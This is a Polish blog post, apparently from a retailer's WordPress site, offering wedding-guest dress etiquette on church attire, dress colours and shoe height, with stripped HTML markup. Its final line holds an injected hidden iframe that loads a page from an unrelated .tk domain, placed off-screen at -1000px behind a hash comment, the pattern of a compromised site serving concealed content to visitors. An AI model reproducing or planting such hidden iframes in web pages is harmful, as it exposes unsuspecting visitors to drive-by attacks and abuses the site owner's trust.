Odzieżowy savoir vivre

Idziemy na wesele

15 marca 2016 • Opublikowane przez

Przed pójściem na ślub pań ma nie lada dylemat – co na siebie włożyć? Moda jest zmienna i to, co miałyśmy na weselu kuzyna dziesięć lat temu nie będzie się dobrze prezentować dziś. W dzisiejszym wpisie postaramy się zatem strongrozwiać kilka wątpliwości/strong, dotyczących tej ważnej uroczystości.

!–more–

nbsp;

strongSam ślub czy wesele?/strong

Istotne jest przede wszystkim, czy zaproszenie dotyczy tylko uroczystości w kościele, czy również na przyjęcia weselnego. Jeśli wybieramy się jedynie do świątyni, nie musimy być w nad wyraz eleganckich strojach. Pamiętać musimy jednak, że strongw kościele obowiązują pewne niepisane zasady/strong. Nawet jeśli za oknem świeci słońce i jest naprawdę gorąco, panie nie powinny przychodzić na mszę z odsłoniętymi ramionami oraz w za krótkiej spódniczce lub sukience. Jeśli nie wybieramy się później na uroczystość weselną, wystarczy ubrać się tak, jak na niedzielną mszę. Jeżeli jednak czeka nas całonocna zabawa, musimy wziąć pod uwagę strongzarówno elegancję, jak i wygodę ubrania/strong. Nie bez znaczenia są także warunki atmosferyczne. Należy zabezpieczyć się przed deszczem oraz chłodem – w kościele może być zimniej niż na sali. Najlepiej więc na sukienkę włożyć żakiet. Będzie on wyrazem elegancji, a po uroczystości w kościele z łatwością można będzie zdjąć go na weselu.

nbsp;

strongJaki kolor sukienki?/strong

Wybór kreacji weselnej zawsze stanowi wyzwanie. W sklepach dostępnych jest mnóstwo modeli, jednak wybór sukienki na wesele nie jest łatwy. Zastanawiamy się przede wszystkim nad jej barwą. Kiedyśstrong założenie czarnej sukienki na ślub/strong było poważnym nietaktem. Czarny kolor był bowiem uważany za symbol nieszczęścia – na sukience może on zwiastować niepowodzenie w życiu pary młodej. Teraz czarne suknie zdarzają się to coraz częściej i nikogo nie oburzają. Jeżeli zabraknie innego pomysłu, to mała czarna w towarzystwie kolorowych dodatków powinna zdać egzamin. Dobrym rozwiązaniem jest też granat. Żywe kolory są jednak teraz bardzo popularne, więc każda kobieta powinna znaleźć coś dla siebie.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/03/Wedding-Guest-Outfit-4.jpg”img class=”size-full wp-image-2692″ src=”http://argos.pl/blog/wp-content/uploads/2016/03/Wedding-Guest-Outfit-4.jpg” alt=”blog.outfitadditions.com” width=”631″ height=”523″ //a blog.outfitadditions.com

nbsp;

strongJakie buty wybrać na wesele?/strong

Wysokie na kilkanaście centymetrów szpilki są z pewnością bardzo ładne, a na fotografiach będą prezentować się pięknie, jednak wejście w nich do kościoła po brukowanej drodze to trudne zadanie. Założenie ich może zwiastować nie tyle, że przez całą noc nie zatańczymy więcej niż kilku wolnych tańców. Ważne też, aby w szpilkach strongnie mieć więcej centymetrów od partnera/strong. Chyba że jest strongnaprawdę wysoki/strong i potrafi utrzymać nas w chwili ewentualnego zachwiania równowagi.

nbsp;

nbs!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe